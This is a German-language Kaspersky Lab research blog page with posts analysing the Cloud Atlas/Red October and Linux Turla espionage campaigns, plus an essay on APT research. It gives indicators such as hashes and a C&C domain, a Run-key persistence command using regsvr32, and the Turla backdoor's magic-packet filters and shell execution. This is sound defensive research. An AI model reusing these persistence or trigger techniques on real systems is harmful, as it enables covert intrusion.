Alle Bedrohungen

Viren

Hacker

Spam

Alle Seiten    Viren
  
Virus Enzyklopädie
Alarme
Analysen
Nachrichten
Glossar
Weblog

 
Kalender

<< 2014  
Jan Feb Mär
Apr Mai Jun
Jul Aug Sep
Okt Nov Dez
Über die Autoren des Tagebuches
Über die Autoren des Tagebuches

Das Analytiker-Tagebuch ist ein weblog, das von den Analytikern des Kaspersky Lab unter der Leitung von Eugene Kaspersky unterhalten wird. Erfahren Sie mehr über die Autoren des weblog.

Cybercrime Umfrage

Sobald Sie Ihren PC mit dem Internet verbinden, wird er zu einem potenziellen Ziel für Cyberkriminelle. Genauso wie Einbrecher bei einem ungesicherten Haus leichtes Spiel haben, ist ein ungeschützter PC wie eine offene Einladung an Autoren von Malware. Cyberbedrohungen werden nicht nur immer raffinierter, sondern nehmen auch ständig zu: Unser Antiviruslabor verzeichnet derzeit über 17.000 neue Internetbedrohungen pro Tag.

Zur Umfrage

 

  Home / Weblog

Analytiker-Tagebuch

Die Kunst, Cyber-Dinoknochen zu finden


  Global Research and Analysis Team of Kaspersky Lab       22 Dezember 2014 | 18:48  MSK

Ihr Kommentar  

“APT-Forschung ist wie Paläontologie...”

Nach der Veröffentlichung unseres Berichts über die von einem Nationalstaat geförderte Regin-Operation wurden Stimmen laut, die fragten, ob Antimalware-Unternehmen auf Bitten von Regierungen und Kunden wissentlich Informationen – und auch Detektionen – zurückhalten. Eine ähnliche Frage warf Bruce Schneier im Jahr 2013 auf.

Um den wichtigsten Punkt gleich von vornherein aus der Welt zu räumen: Wir wurden noch nie von einem Kunden oder einer Regierungsorganisation aufgefordert, ein bestimmtes Malware-Sample auf die Weiße Liste zu setzen oder die Detektion einzustellen. Und wir würden nie auf eine solche Forderung eingehen, ganz egal, woher sie stammt.

So etwas kommt einfach nicht vor. In manchen Fällen werden im Rahmen von Ermittlungen zielgerichteter Attacken Geheimhaltungsvereinbarungen mit Kunden abgeschlossen, und wir sind verpflichtet, den Fall vertraulich zu behandeln, aber das betrifft nie das Hinzufügen von Detektionen und den Schutz unseres gesamten Kundenstammes vor Bedrohungen.

Warum hat es also zwei Jahre gedauert, bis wir endlich einen Bericht über Regin veröffentlichten? Ohne passenden Kontext kann es sein, dass Forscher etwas wirklich Wichtiges für eine ungewöhnlich lange Zeit geheim halten. Doch Sicherheitsermittlungen – ähnlich wie forensische Ermittlungen – machen akribische Untersuchungen und Analysen erforderlich und in vielen Fällen ist es wichtig zu beobachten, wie sich das Verbrechen in Echtzeit entfaltet, um einen richtigen Fall daraus machen zu können.

In unserem Fall – ohne unbegrenzte Mittel im Hintergrund und eingedenk der Tatsache, dass wir eine Vielzahl von APT-Akteuren gleichzeitig verfolgen (Careto/Mask, EpicTurla, Darkhotel, Miniduke/Cosmicduke, um nur einige zu nennen) -, werden Ermittlungen zu einem Monate, ja sogar Jahre währenden Prozess, wenn das Ziel das vollständige Verständnis einer Cyber-Operation sein soll.

Sean Sullivan von F-Secure lieferte die perfekte Beschreibung einer APT-Untersuchung, indem er sie mit der Arbeit eines Paläontologen verglich, der einige Knochen eines Dinosauriers gefunden hat. Jeder hat vielleicht einen Knochen, aber niemand hat das vollständige Skelett.

Im Fall von Regin entdeckten wir im Jahr 2012 als erstes einen leicht beschädigten Knochen von einem unbekannten Teil eines Monsters, das in einem mysteriösen Bergsee legt.

(Freundlicherweise zur Verfügung gestellt von southampton.ac.uk)

Findet irgendjemand einen Knochen, so mag er ihn wegwerfen und weiterziehen, doch wir in der Sicherheitsforschung sammeln die Dinge. Der Originalfund landete in unserer Sachen-Sammlung im Hinterhof. Wir haben viele solcher angeschlagenen Knochen von niemals gesehenen Monstern oder vielleicht auch von harmlosen Kreaturen. Manchmal hören wir etwas über Knochenteile, die von anderen gefunden wurden und das verleitet uns dann dazu, einen genaueren Blick darauf zu werfen. Doch in diesem frühen Stadium - ohne ausreichende Beweise – ist es nicht möglich, sinnvolle Schlussfolgerungen zu ziehen, und es ergibt keinen Sinn, mit den Entdeckungen an die Öffentlichkeit zu gehen, bevor man nicht mit Sicherheit behaupten kann, dass die Monster wirklich real, groß und gefährlich sind.

Wir forschen in viele Richtungen, um unterschiedliche Artefakte zu sammeln, die zu einigen Stücken aus unserer Sammlung passen oder eben auch nicht passen. Manchmal arbeiten wir mit anderen "Paläontologen" zusammen und teilen unsere Entdeckungen. Haben wir einmal ausreichend viele Knochen von einem Monster zusammengetragen, um seine potentielle Größe, die Gefahr, die von ihm ausgeht und seinen möglichen Lebensraum zu bestimmen, können wir in die nächste Phase eintreten, bei der es sich dann schon um echte, aktive Ermittlungsarbeit handelt, die uns zu dem mysteriösen Bergsee führen könnte.

Ein umfassendes APT-Forschungsprojekt läuft in mehreren Stufen ab:

  1. Detektion für bekannte Module hinzufügen
  2. Samples sammeln
  3. Samples reversieren
  4. Raffinierte Verschlüsselungs - und Komprimierungstechniken entschlüsseln
  5. Laterale Bewegungen nachvollziehen
  6. Die einzelnen Angriffsstufen in die richtige Reihenfolge bringen
  7. Die C&C-Infrastruktur aufzeichnen
  8. Sinkholes errichten
  9. Den gesammelten Traffic und die Kommunikationsprotokolle analysieren
  10. Andere Hosts abarbeiten, die dasselbe Protokoll verstehen
  11. C&C-Server demontieren und Abbilder von ihnen erstellen
  12. Opfer identifizieren, Opfer und die globalen CERTs benachrichtigen
  13. Forensische Analyse anwenden und Protokolle, gestohlene Dateien und andere Komponenten herausziehen
  14. Die Daten vom KSN, den C&C-Servern und individuellen Opfern, die gewillt sind, mit uns zusammenzuarbeiten, von Sinkholes, Crawlern usw. sammeln und analysieren
  15. Einen umfassenden Bericht schreiben

Wenn wir Glück haben, finden wir ein Monster in freier Wildbahn – die beste Quelle für wissenschaftliche Studien. In den meisten Fällen, Regin eingeschlossen, lernen wir von dem Verhalten eines lebendigen Monsters. Wir zeichnen jeden einzelnen Schritt und jedes Vorhaben auf.

Gleichzeitig können wir es auch einfangen und im Labor studieren wie Zoologen. Trotzdem bekommen wir in vielen Forschungsuntersuchungen nur ein Skelett eines Monsters zu sehen. Wir müssen alles zusammensetzen und rekonstruieren, wie das Monster sich bewegt und verhalten hat, welche Arten es angegriffen hat und wie diese Attacken koordiniert wurden. Einfach ausgedrückt: Es erfordert Zeit und Geduld.

Außerdem: Wenn wir die Eigenschaften einer bestimmten Kreatur analysieren, berücksichtigen wir dabei auch, dass die Evolution voranschreitet und es auch noch andere Spezies gibt, lebendig und aktiv, dabei aber komplett unsichtbar für uns.

Während einige der Regin-Samples schon früh auf unserem Radar erschienen und während wir im Laufe unserer Untersuchungen immer wieder zusätzliche Samples und Artefakte gefunden haben, sind wir doch überzeugt, dass es auch noch andere gibt, die bisher noch unbekannt und unentdeckt sind. In der Vergangenheit wusste man nur wenig über ihre Leben und ihre Existenz, aber wir wissen, dass sie da waren, weil wir im Laufe der Zeit winzige Fragmente gefunden haben. Und ich muss erneut einen Bezug zur Paläontologie herstellen, denn an dem Großen und Ganzen gemessen haben wir erst einen kleinen Teil des gesamten Biests entdeckt, aber immerhin schon genug, um einen öffentlichen Alarm auszulösen.

Wie im Fall von Regin detektieren wir manchmal schon seit Jahren Teile einer Malware, bevor wir bemerken, dass sie Teil einer globalen Cyberspionage-Kampagne sind. Ein gutes Beispiel dafür ist die Geschichte von Roter Oktober. Wir haben schon lange Komponenten von Roter Oktober detektiert, bevor wir herausfanden, dass sie in zielgerichteten Attacken gegen diplomatische Einrichtungen, Regierungsorganisationen und wissenschaftliche Forschungsinstitute eingesetzt wurden.

Bei Kaspersky Lab bearbeiten wir tagtäglich hunderttausende Samples. Die Kunst, herauszufinden, welche von ihnen von Bedeutung sind, und weiterhin auszumachen, welche als Teil einer groß angelegten APT-Attacke zusammengehören, ist mit der Suche nach Nadeln in einem großen Heuhaufen vergleichbar. Hat man welche gefunden, muss man anschließend noch herauszufinden, welche Nadeln zu welcher Strickarbeit gehören. Wir sind dankbar für jede Nadel, die wir finden, denn dadurch wird die Welt ein wenig sicherer.

Cloud Atlas: APT Roter Oktober ist wieder im Spiel


  Global Research and Analysis Team of Kaspersky Lab       22 Dezember 2014 | 14:58  MSK

Ihr Kommentar  

Vor zwei Jahren veröffentlichten wir eine Studie über Roter Oktober, eine komplexe Cyberspionage-Operation, die diplomatische Einrichtungen und Botschaften auf der ganzen Welt angriff. Wir tauften die Kampagne auf den Namen Roter Oktober, da wir unsere Ermittlungen in diesem Fall im Oktober 2012 starteten, einem ungewöhnlich heißen Monat.

Nach unseren Enthüllungen im Januar 2013 wurde die Operation Roter Oktober umgehend abgeblasen und das Netzwerk von Command-und-Control-Servern wurde demontiert. Wie immer bei derart umfangreichen Operationen sind sie – gerade auch wegen der großen Investitionen und der Menge an Ressourcen, die dahinter stecken –, nicht auf einen Schlag und für immer von der Bildfläche verschwunden. Normalerweise taucht eine solche Gruppe für ein paar Wochen unter, baut die Tools und die Schadprogramme um und belebt die Operation wieder neu.

Siehe hierzu auch:

Seit Januar 2013 warten wir auf ein potentielles Comeback von Roter Oktober. Ein möglicher Treffer war Mevade, ein ungewöhnliches Stück Schadcode, das Ende 2013 auf der Bildfläche erschien. Die Namen der C&C von Mevade sowie einige technische Ähnlichkeiten deuteten auf eine Verbindung zu Roter Oktober hin, doch der Link war nur schwach. Erst im August 2014 konnten wir Beobachtungen machen, die uns vermuten ließen, dass Roter Oktober endgültig zurückgekehrt ist.

Dürfen wir vorstellen? Cloud Atlas!

Im August 2014 bemerkten einige unserer Nutzer zielgerichtete Attacken mit einer Variation von CVE-2012-0158 und einem ungewöhnlichen Schadprogramm-Set. Wir führten eine Schnellanalyse der Malware durch und sie fiel sofort wegen einiger ungewöhnlicher Dinge auf, die in der APT-Welt nicht unbedingt gängig sind.

Unter den Namen der in den Attacken verwendeten Dateien waren auch die folgenden:

  • FT - Ukraine Russia's new art of war.doc
  • Катастрофа малайзийского лайнера.doc
  • Diplomatic Car for Sale.doc
  • МВКСИ.doc
  • Organigrama Gobierno Rusia.doc
  • Фото.doc
  • Информационное письмо.doc
  • Форма заявки (25-26.09.14).doc
  • Информационное письмо.doc
  • Письмо_Руководителям.doc
  • Прилож.doc
  • Car for sale.doc
  • Af-Pak and Central Asia's security issues.doc

Mindestens eine erinnerte uns sofort an die Kampagne Roter Oktober, im Rahmen derer auch ein sehr ähnlicher Spearphishing-Ansatz verwendet wurde: "Diplomatic Car for Sale.doc". Je tiefer wir mit unserer Analyse in die Operation vordrangen, desto mehr Details kamen zum Vorschein, die diese Theorie unterstützten.

Das Ungewöhnlichste war wahrscheinlich, dass das Microsoft Office-Exploit nicht direkt eine Windows PE-Backdoor auf die Festplatte geschrieben hat. Stattdessen schreibt es ein verschlüsseltes Visual Basic Script und führt es aus.

Exploit-Payload von Cloud Atlas - VBScript

Dieses VBScript wirft ein Dateien-Paar auf der Festplatte ab – einen Loader und eine verschlüsselte Payload. Der Loader scheint jedes Mal anders zu sein und interne Zeichenketten weisen darauf hin, dass er "polymorph" generiert wurde. Die Payload ist immer mit einem einzigartigen Schlüssel chiffriert, wodurch es unmöglich wird, sie zu entschlüsseln, wenn die DLL nicht verfügbar ist.

Wir haben mehrere verschiedene Spearphishing-Dokumente gefunden, die individuell benannte Payloads transportieren. Beispielsweise wirft die MD5 der Datei "qPd0aKJu.vbs":

E211C2BAD9A83A6A4247EC3959E2A730 die folgenden Dateien ab:

DECF56296C50BD3AE10A49747573A346 - bicorporate – verschlüsselte Payload
D171DB37EF28F42740644F4028BCF727 - ctfmonrn.dll - Loader

Das VBS ergänzt zudem einen Registrierungsschlüssel:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ der den Schlüssel "bookstore" auf den Wert "regsvr32 %path%\ctfmonrn.dll /s" einstellt, wodurch sichergestellt wird, dass die Malware bei jedem Systemboot ausgeführt wird.

Zu den DLL-Namen, die wir beobachtet haben, gehören:

f4e15c1c2c95c651423dbb4cbe6c8fd5 - bicorporate.dll649ff144aea6796679f8f9a1e9f51479 - fundamentive.dll
40e70f7f5d9cb1a669f8d8f306113485 - papersaving.dll
58db8f33a9cdd321d9525d1e68c06456 - previliges.dll
f5476728deb53fe2fa98e6a33577a9da - steinheimman.dll

Einige der Payload-Namen enthalten:

steinheimmanpapersaving
previliges
fundamentive
bicorporate
miditiming
damnatorily
munnopsis
arzner
redtailed
roodgoose
acholias
salefians
wartworts
frequencyuse
nonmagyar
shebir
getgoing

Die Payload umfasst einen verschlüsselten Konfigurationsblock, der Informationen über den C&C-Server enthält:

Die Informationen aus der config beinhalten eine WebDAV URL, die für Verbindungen benutzt wird, einen Nutzernamen und ein Passwort, zwei Ordner auf dem WebDAV-Server zum Speichern von Plugins/Modulen für die Malware und zum Upload der beim Opfer gesammelten Daten.

C&C-Kommunikation

Die CloudAtlas-Implantate wenden einen recht ungewöhnlichen C&C-Mechanismus an. Alle Malware-Samples, die uns untergekommen sind, kommunizieren via HTTPS und WebDav mit demselben Server von "cloudme.com", einem Cloud-Services-Provider. Laut der offiziellen Website ist CloudMe im Besitz von CloudMe AB und wird auch von diesem Unternehmen mit Sitz in Linköping, Schweden, betrieben.

(Wichtige Anmerkung: Wir glauben nicht, dass CloudMe in irgendeiner Weise mit der CloudAtlas-Gruppe in Verbindung steht – die Angreifer erstellen einfach kostenlose Accounts bei diesem Provider und missbrauchen sie als Command-and-Control-Accounts).

Doch jedes Schadprogramm-Set, das wir bisher beobachtet haben, kommuniziert mit einem anderen CloudMe-Account. Die Angreifer laden Daten auf den Account hoch, die vom Implantat heruntergeladen, entschlüsselt und ausgewertet werden. Im Gegenzug lädt die Malware mit Hilfe desselben Mechanismus‘ die Antworten zurück auf den Server hoch. Sicherlich ist es möglich, die Malware neu zu konfigurieren, so dass jeder Cloud-basierte Speicherdienst genutzt werden kann, der WebDAV unterstützt.

Hier ein Beispiel für einen solchen Account von CloudMe:

Die Daten von dem Account:

Die in dem willkürlich benannten Ordner gespeicherten Daten wurden von der Malware hochgeladen und enthalten verschiedene Dinge, wie etwa Systeminformationen, laufende Prozesse und den aktuellen Nutzernamen. Die Daten werden mit LZMA komprimiert und mit AES verschlüsselt, doch die Schlüssel werden in dem Schadprogramm-Körper gespeichert, wodurch es möglich wird, die Informationen vom C&C zu entschlüsseln.

In der Vergangenheit hatten wir es bisher nur mit einer anderen Gruppe zu tun, die eine ähnliche Methode angewendet hat – ItaDuke – die sich mit Accounts bei dem Cloud-Provider mydrive.ch verbunden hat.

Opferstatistik: Top 5 der infizierten Länder

 CloudAtlasRoter Oktober
Russland1535
Kasachstan1421
Weißrussland45
Indien214
Tschechische Republik2< 5

Ähnlichkeiten mit Roter Oktober

Gemäß den vom Kaspersky Security Network (KSN) zusammengetragenen Daten steht wie im Fall von Roter Oktober Russland auch auf der Opferliste von Cloud Atlas ganz oben, dicht gefolgt von Kasachstan. Tatsächlich sehen wir hier eine offensichtliche Schnittmenge der Ziele zwischen diesen beiden Ländern, mit leichten Unterschieden aufgrund der geopolitischen Veränderungen in der Region, die sich im Laufe der letzten zwei Jahre ergeben haben.

Interessanterweise scheinen einige der Spearphishing-Dokumente, die einerseits CloudAtlas und andererseits Roter Oktober zugerechnet werden, dasselbe Thema auszunutzen und dieselbe Organisation zu unterschiedlichen Zeiten anzugreifen.

CloudAtlasRoter Oktober

Sowohl die zu CloudAtlas als auch die zu Roter Oktober gehörende Malware basieren auf ähnlichen Konstrukten, mit einem Loader und der endgültigen Payload, die in einer externen Datei in komprimierter Form gespeichert werden. Allerdings gibt es auch einige wichtige Unterschiede, unter anderem bei dem verwendeten Verschlüsselungsalgorithmus – RC4 in Roter Oktober gegenüber AES in Cloud Atlas.

Bei dem verwendeten Kompressionsalgorithmus in Cloud Altas und Roter Oktober gibt es weitere interessante Ähnlichkeiten. Beide Schadprogramme haben den Code für den LZMA-Kompressionsalgorithmus gemeinsam. In CloudAtlas wird er benötigt, um die Logdateien zu komprimieren und die entschlüsselte Payload von den C&C-Servern zu dekomprimieren, während es in Roter Oktober vom "Scheduler"-Plugin benutzt wird, um die ausführbaren Payloads von den C&C zu dekomprimieren.

Es zeigt sich, dass die Implementierung des Algorithmus‘ in beiden Schadmodulen identisch ist, obgleich die Art und Weise, auf die er aufgerufen wird, sich durch die in der Version von CloudAtlas hinzugefügten Plausibilitätsprüfungen ein wenig unterscheidet.

Eine weitere interessante Ähnlichkeit zwischen den Malware-Familien liegt in der Konfiguration des Build-Systems, das zur Kompilierung der Binärdateien verwendet wird. Jede Binärdatei, die unter Verwendung der Microsoft Visual Studio Toolchain erstellt wurde, hat einen speziellen Header, der Information über die Zahl der eingegebenen Objektdateien und Versionsinformationen zu dem Compiler enthält, der zu ihrer Erstellung verwendet wurde - den "Rich"-Header, der von der magischen Zeichenkette so genannt wird, die verwendet wird, um ihn in der Datei zu identifizieren.

Wir konnten einige Binärdateien von Roter Oktober identifizieren, die „Rich“-Header haben, die genau dasselbe Layout der Objektdateien VC 2010 + VC 2008 beschreiben. Obwohl das nicht zwangsläufig bedeuten muss, dass die Binärdateien auf demselben Entwicklungscomputer erstellt wurden, wurden sie definitiv unter Verwendung derselben Version von Microsoft Visual Studio kompiliert, bis hin zu der Build-Versionsnummer und unter Verwendung einer ähnlichen Projektkonfiguration.

Anzahl der Objektdateien, CloudAtlas-LoaderAnzahl der Objektdateien, Roter Oktober Office-PluginAnzahl der Objektdateien, Roter Oktober Fileputexec-PluginHEX Compiler-VersionDecodierte Compiler-Version
010101009D766FVC 2010 (build 30319)
010101009B766FVC 2010 (build 30319)
222E6000AB766FVC 2010 (build 30319)
5B60A300010000
05071100937809VC 2008 (build 30729)
725CAD00AA766FVC 2010 (build 30319)
201018009E766FVC 2010 (build 30319)

Hier die Ähnlichkeiten zwischen beiden im Überblick:

 Cloud AtlasRoter Oktober
Shellcodemarker in Spearphishing-DokumentenPT@TPT@T
Am stärksten angegriffenes OpferlandRusslandRussland
Kompressionsalgorithmus, der für die C&C-Kommunikation verwendet wirdLZMALZMA
C&C-Server behaupten zu sein / umgeleitet aufBBC (mobile malware)BBC
Compiler-VersionVC 2010 (build 30319)VC 2010 (build 30319) (einige Module)

Die auffälligste Verbindung zwischen den beiden schließlich liegt vermutlich in den Angriffszielen. Auf Grundlage der vom KSN gesammelten Daten werden einige der Opfer von Roter Oktober auch von CloudAtlas angegriffen. In mindestens einem Fall wurde der Computer eines Opfers nur zweimal in den letzten zwei Jahren angegriffen, und zwar von nur zwei Schadprogrammen Roter Oktober und CloudAtlas.

Diese und andere Details lassen uns vermuten, dass CloudAtlas als Reinkarnation der Angriffe von Roter Oktober anzusehen ist.

Fazit

Infolge umfassender Berichterstattung und öffentlicher Enthüllungen über zielgerichtete Angriffsoperationen benehmen sich APT-Gruppen nun äußerst vorhersehbar. Die meisten chinesischsprachigen Angreifer verlegen ihre C&C-Server einfach an einen anderen Ort, kompilieren die Malware neu und machen weiter, als wäre nichts geschehen.

Andere Gruppen, die sich mehr vor Entdeckung fürchten, begeben sich für Monate oder Jahre in eine Art Winterschlaf. Einige kehren nie wieder mit denselben Techniken und Tools zurück.

Doch wenn eine groß angelegte Cyberspionage-Operation aufgedeckt wird, so ist es äußerst unwahrscheinlich, dass die Angreifer die gesamte Operation komplett stilllegen. Sie gehen einfach für eine gewisse Zeit offline, mischen ihre Tools neu und kehren mit verjüngten Kräften zurück.

Wir glauben, dass das auch auf Roter Oktober zutrifft - eine APT, die mit CloudAtlas ein klassisches Comeback hinlegt.

Die Produkte von Kaspersky Lab detektieren die Malware aus dem Cloud Atlas-Werkzeugkasten unter den folgenden Bezeichnungen:

Exploit.Win32.CVE-2012-0158.j
Exploit.Win32.CVE-2012-0158.eu
Exploit.Win32.CVE-2012-0158.aw
Exploit.MSWord.CVE-2012-0158.ea
HEUR:Trojan.Win32.CloudAtlas.gen
HEUR:Trojan.Win32.Generic
HEUR:Trojan.Script.Generic
Trojan-Spy.Win32.Agent.ctda
Trojan-Spy.Win32.Agent.cteq
Trojan-Spy.Win32.Agent.ctgm
Trojan-Spy.Win32.Agent.ctfh
Trojan-Spy.Win32.Agent.cter
Trojan-Spy.Win32.Agent.ctfk
Trojan-Spy.Win32.Agent.ctfj
Trojan-Spy.Win32.Agent.crtk
Trojan-Spy.Win32.Agent.ctcz
Trojan-Spy.Win32.Agent.cqyc
Trojan-Spy.Win32.Agent.ctfg
Trojan-Spy.Win32.Agent.ctfi
Trojan-Spy.Win32.Agent.cquy
Trojan-Spy.Win32.Agent.ctew
Trojan-Spy.Win32.Agent.ctdg
Trojan-Spy.Win32.Agent.ctlf
Trojan-Spy.Win32.Agent.ctpz
Trojan-Spy.Win32.Agent.ctdq
Trojan-Spy.Win32.Agent.ctgm
Trojan-Spy.Win32.Agent.ctin
Trojan-Spy.Win32.Agent.ctlg
Trojan-Spy.Win32.Agent.ctpd
Trojan-Spy.Win32.Agent.ctps
Trojan-Spy.Win32.Agent.ctpq
Trojan-Spy.Win32.Agent.ctpy
Trojan-Spy.Win32.Agent.ctie
Trojan-Spy.Win32.Agent.ctcz
Trojan-Spy.Win32.Agent.ctgz
Trojan-Spy.Win32.Agent.ctpr
Trojan-Spy.Win32.Agent.ctdp
Trojan-Spy.Win32.Agent.ctdr
Trojan.Win32.Agent.idso
Trojan.Win32.Agent.idrx
HEUR:Trojan.Linux.Cloudatlas.a
Trojan.AndroidOS.Cloudatlas.a
Trojan.IphoneOS.Cloudatlas.a

Die 'Pinguin'-Turla-APT


  Kurt Baumgartner       15 Dezember 2014 | 18:54  MSK

Ihr Kommentar  

Kürzlich wurde ein interessantes Malware-Sample zu einem AV-Multiscanner-Service hochgeladen. Sofort war unser Interesse geweckt, denn es scheint sich dabei um ein bisher unbekanntes Teil eines größeren Puzzles zu handeln. Das Puzzle, das wir meinen, ist "Turla", eine der komplexesten APTs überhaupt.

Wir haben bereits früher über die Turla APT, ihre Epic Turla-Operationen und die Verbindung zu Agent.btz berichtet.

Bisher war jedes einzelne Turla-Sample, das uns untergekommen ist, für die Microsoft Windows-Familie, 32- und 64 Bit Betriebssysteme, konstruiert. Das kürzlich aufgetauchte Turla-Sample ist deswegen ungewöhnlich, weil es das erste Turla-Sample ist, das Linux-Betriebssysteme angreift, das wir entdeckt haben.

Die jüngst entdeckte Turla-Komponente unterstützt Linux für weiter reichenden Systemsupport auf Opfer-Sites. Das Angriffstool ist ein weiteres Teil aus dem Set neben dem Snake Rootkit und den Komponenten, die vor ein paar Jahren als erstes mit diesem Bedrohungsakteur in Verbindung gebracht wurden. Wir vermuten, dass diese Komponente jahrelang auf einer Opfer-Site gelaufen ist, aber wir haben noch keine konkreten Daten, die diese Behauptung bestätigen.

Das Turla-Modul für Linux ist eine ausführbare Datei in C/C++ die statisch gegen eine Vielzahl von Bibliotheken gelinkt ist, die ihre Dateigröße bei weitem übersteigen. Es wurde von Symbolinformationen befreit, vermutlich eher, um die Analyseleistung zu steigern, als die Dateigröße zu verringern. Seine Funktionalität beinhaltet verborgene Netzwerkkommunikation und willkürliche entfernte Befehlsausführung sowie entfernte Verwaltung. Ein großer Teil des Codes dieser Komponente basiert auf öffentlichen Quellen.

Md5GrößeName
0994d9deb50352e76b0322f48ee576c6627.2 kbN/A (beschädigte Datei)
14ecd5e6fc8e501037b54ca263896a11637.6 kbHEUR:Backdoor.Linux.Turla.gen

Allgemeine ausführbare Charakteristika:

ELF 32-bit LSB ausführbare Datei, Intel 80386, Version 1 (SYSV), statisch verlinkt, für GNU/Linux 2.2.5, stripped

Statisch verlinkte Bibliotheken:

  • glibc2.3.2 - die GNU C Library
  • openssl v0.9.6 – eine ältere OpenSSL-Bibliothek
  • libpcap – die Bibliothek von tcpdump zum Mitschneiden von Netzwerkverkehr

Hartcodiertes C&C, bekannte Turla-Aktivität: news-bbc.podzone[.]org
Die Domain hat die folgende pDNS IP: 80.248.65.183


80.248.65.183
aut-num: AS30982
announcement: 80.248.65.0/24
as-name: CAFENET
descr: CAFE Informatique et telecommunications
admin-c: YN2-AFRINIC
tech-c: AN39-AFRINIC
org: ORG-CIet1-AFRINIC
mnt-by: AFRINIC-HM-MNT
mnt-lower: CAFENET-NOC
source: AFRINIC # Filtered

Anmerkung: Die C&C-Domain wird aktuell von Kaspersky Lab auf einen Sinkhole-Server umgeleitet.

Funktionale Beschreibung

Bei diesem Sample handelt es sich um eine auf cd00r Quellen basierende Stealth Backdoor.

Diese auf cd00r basierende Turla-Malware ist in der Lage sich zu tarnen, ohne erhöhte Privilegien zu benötigen, während sie willkürlich entfernt Befehle ausführt. Sie kann nicht via netstat, einem gängigen Verwaltungstool, detektiert werden. Sie verwendet Techniken, die keinen Root-Zugriff erforderlich machen, wodurch sie problemloser auf mehr Opfer-Hosts laufen kann. Selbst wenn sie ein regulärer Nutzer mit eingeschränkten Privilegien startet, kann sie weiterhin einkommende Pakete abfangen und eingehende Befehle auf dem System ausführen.

Inbetriebnahme und Ausführung

Um die Ausführung zu starten, benötigt der Prozess zwei Parameter: Die ID (einen numerischen Wert, der als Teil des „magischen Pakets zur Authentifizierung“ genutzt wird) und einen existierenden Netzwerk-Interface-Namen. Die Parameter können auf zwei verschiedene Arten eingegeben werden: STDIN oder von einem Dropper, der das Sample startet. Das ist KEIN Befehlszeilenparameter, es ist ein realer User, der den Angreifer umgehend auffordert, die Eingabeparameter bereitzustellen. Nachdem die ID und der Interfacename eingegeben und der Prozess gestartet wurde, wird die PID des Backdoor-Prozesses zurückgeschickt. Hier ein Screenshot dieses simplen Interfaces:

Während es keinen ursprünglichen Netzwerk-Callback gibt, unterhält ein Codeabschnitt den hartkodierten c2-String "news-bbc.podzone[.]org". Dieser voll qualifizierte Domainname wurde erstmals im Jahr 2010 eingerichtet, was zu der Annahme verleitet, das diese Binärdatei erst recht kurze Zeit in dem String der Turla-Kampagnen vorhanden ist. Und während wir keine weitere Datei-Downloadaktivität von diesem Server mit diesem Tool beobachten konnten, ist es wahrscheinlich, dass es als eine Art Dateiserver beteiligt war.

Magische Pakete für das entfernte Ausführen von Befehlen

Das Modul verlinkt PCAP-Bibliotheken statisch und verwendet diesen Code, um einen RAW Socket zu erhalten, wendet einen Filter auf ihn an und fängt Pakete ab, die auf bestimmte Bedingungen untersucht werden (das *original cd00r verwendete diese Methode zuerst, basierend auf Ports und SYN-Paketen). Diese Bedingung wird hier ausgedrückt (sie basiert auf dem ID-Eingabewert bei der Inbetriebnahme durch die Angreifer):

ID = 123 Filter = (tcp[8:4] & 0xe007ffff = 0xe003bebe) or (udp[12:4] & 0xe007ffff = 0xe003bebe) ID = 321 Filter = (tcp[8:4] & 0xe007ffff = 0x1bebe) or (udp[12:4] & 0xe007ffff = 0x1bebe)

In einfachen Worten – es sucht nach einer ACK-Nummer im TCP-Header oder dem zweiten Byte von dem UDP-Paketkörper.

Wird so ein Paket erhalten und der Bedingungscheck ist erfolgreich, springt die Ausführung zu den Inhalten der Paket-Payload und erstellt einen regulären Socket. Die Backdoor behandelt diesen Socket wie eine Datei mit Lese-/Schreib-Operationen. In diesem Code wird nicht das typische recv/send verwendet. Es benutzt diesen neuen Socket, um sich mit der Quelle der Adresse des "magischen Pakets" zu verbinden. Daraufhin gibt es seine eigene PID und IP an die entfernte Adresse weiter und startet eine Endlosschleife zum Empfang entfernter Befehle. Kommt ein Befehl herein, so wird er mit einem "/bin/sh -c "-Skript ausgeführt.

Weitere Analysen der Funktionalität des Samples werden wir an dieser Stelle veröffentlichen.

Fazit

Obgleich bekannt war, dass Linux-Varianten für das Turla-Framework existieren, haben wir bisher keine in freier Wildbahn beobachten können.

Dieses spezifische Modul scheint aus offiziellen Quellen zusammengesetzt worden zu sein, wobei die Angreifer verschiedene Funktionen hinzugefügt haben. Ein Teil des Schadcodes scheint inaktiv zu sein, vielleicht handelt es sich dabei um Überbleibsel älterer Versionen des Implantats. Der vielleicht interessanteste Teil ist ein ungewöhnlicher C&C-Mechanismus, der auf TCP/UDP-Paketen basiert, sowie der C&C-Hostname, der zur bereits bekannten Turla-Aktivität passt.

Die Entdeckung dieses Turla-Moduls wirft eine große Frage auf: Wie viele andere unbekannte Turla-Varianten gibt es noch?

Update: Nach der Veröffentlichung dieses Blogposts haben wir ein weiteres Turla-Modul für Linux entdeckt, das eine andere Malwaregeneration als die bisher bekannten Samples repräsentiert:

Das neue Sample wurde von unseren Produkten mit heuristischen Methoden entdeckt, aufgrund von Ähnlichkeiten zu vorher detektierten Samples.

Md5GrößeName
19fbd8cbfb12482e8020a887d6427315801,561 bytesHEUR:Backdoor.Linux.Turla.gen

Löcher im Schutz von Unternehmensnetzwerken: Netzwerk-Schwachstellen


  Kirill Kruglov        11 November 2014 | 16:17  MSK

Ihr Kommentar  

In einem früheren Blog haben wir darüber berichtet, welche Attacken Cyberkriminelle durchführen können, die mit dem Account eines normalen Anwenders operieren, ohne über die Rechte eines lokalen Administrators zu verfügen. Unter anderem haben wir das Beispiel angeführt, wie die so genannte Eilanmeldung im Rahmen der Domain-Autorisierung (Single-Sign-On) es einem Cyberkriminellen ermöglichen kann, Zugriff auf verschiedene Netzwerkressourcen zu erhalten, auch wenn er nur mit dem eingeschränkten Account eines gewöhnlichen Anwenders agiert. In diesem Blog betrachten wir detailliert die möglichen Angriffsvektoren auf Unternehmensnetzwerke von innen heraus, d.h. von einem infizierten Computer aus.

